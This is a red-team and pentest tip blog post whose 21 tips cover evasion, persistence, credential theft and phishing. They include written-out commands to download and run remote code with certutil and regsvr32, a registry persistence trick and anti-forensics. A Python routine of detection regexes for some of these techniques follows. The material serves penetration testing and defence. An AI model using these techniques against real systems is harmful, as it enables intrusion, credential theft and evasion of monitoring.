synack.blog


I am collecting/writing red team and pentest tips. Please send yours in a comment and I will add it quickly. Feedback is also welcome.
  1. You can use high-reputation redirectors like Google or AWS in C&C communications to bypass reputation-based whitelists. @1ce7ea redteam
  2. Use CleanWipe to uninstall SEP (Symantec Endpoint Protection). It doesn't require Administrator privileges. @dimakoci_ redteam windows
  3. Scan all local network IP ranges (192.168.x.x, 172.16.x.x, 10.x.x.x) instead of only the given scope. You can find forgotten networks or hosts. @kayhankayihan pentest
  4. Use net user /dom instead of net user /domain. The second one may be being watched by the endpoint solution. @vysecurity redteam pentest windows
  5. Use wmiexec instead of psexec. It makes less noise. redteam pentest windows
  6. If you need to put a file on disk, use Alternate Data Streams. @Oddvarmoe redteam windows
  7. If you have a low-privilege shell, use a fake login prompt to collect credentials. @enigma0x3 redteam windows
  8. If you need plaintext credentials and you don't want to use mimikatz, dump lsass and parse it locally. redteam windows
  9. Avoid wtmp logging with ssh -l username target -T. @pwnagelabs redteam linux
  10. Use kill -9 $$ to avoid writing bash history on exit. @pwnagelabs redteam linux
  11. If you have a connection but NAC is blocking you, listen to broadcasts and collect MAC addresses, then use a printer's MAC for NAC bypass. redteam pentest
  12. Scan the external network with Nessus, Netsparker, etc., or make small DoS/DDoS attacks to hide the real action from the blue team. @corpuscallosum redteam
  13. Use the ROPEMAKER method and CVE-2017-0199 for creating phishing mails. redteam
  14. You can download any file with the signed certutil.exe like this: redteam pentest windows
    certutil -urlcache -split -f <url> <out_filename>
  15. You can run your DLLs like this: redteam pentest windows
    regsvr32 /s /u dll_name
  16. You can run scripts remotely with regsvr32.exe like this: @subTee redteam pentest windows
    regsvr32 /s /n /u /i:<url> scrobj.dll
  17. Use SMTP relay for internal phishing. redteam
  18. You can encrypt your payloads/macros using the target company's domain name as the key. redteam pentest windows
  19. You can use HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ with the Debugger value for persistence. redteam windows
  20. You must tune the connection limit when using automated vulnerability scanners to avoid network dropouts. @Kayranfatih pentest
  21. You can use the Windows certreq.exe for data exfiltration. @doylersec redteam windows
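A defender-side counterpart to tips 4, 14, 16 and 19, added here as an example and not part of the original post: a small Python routine that flags process command lines matching those patterns. The events, rule names and hostnames are constructed for the example.

```python
import re

# Constructed process-creation records (process name, command line); these are
# sample inputs made up for this example, not real telemetry.
SAMPLE_EVENTS = [
    ("certutil.exe", "certutil -urlcache -split -f http://example.invalid/a.txt a.txt"),
    ("certutil.exe", "certutil -verify -urlfetch cert.cer"),
    ("regsvr32.exe", "regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    ("regsvr32.exe", "regsvr32 /s C:\\Program Files\\Vendor\\plugin.dll"),
    ("net.exe", "net user admin /dom"),
    ("net.exe", "net user admin /domain"),
    ("reg.exe", 'reg add "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\'
                'Image File Execution Options\\placeholder.exe" /v Debugger /d C:\\placeholder.exe'),
    ("reg.exe", 'reg query "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion"'),
]

# Detection rules: (rule name, case-insensitive regex over the command line).
RULES = [
    # Tip 14: certutil fetching from a URL into the cache and writing it to disk.
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    # Tip 16: regsvr32 given a remote URL via /i: together with scrobj.dll.
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:\s*https?://.*\bscrobj\.dll\b", re.I)),
    # Tip 4: match the abbreviated /dom switch as well as the full /domain form.
    ("net_user_domain_enum",
     re.compile(r"\bnet(1)?(\.exe)?\s+user\b.*\s/dom\w*", re.I)),
    # Tip 19: a Debugger value being set under Image File Execution Options.
    ("ifeo_debugger_persistence",
     re.compile(r"image file execution options.*\bdebugger\b", re.I)),
]


def detect(events):
    """Return (rule_name, command_line) for every event matching any rule."""
    hits = []
    for _process, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, cmdline))
    return hits


if __name__ == "__main__":
    for name, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmdline}")
```

Feeding the same rules real process-creation telemetry (for example Sysmon event ID 1 command lines) turns the tip list into a review checklist for what the endpoint solution already logs.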

Bye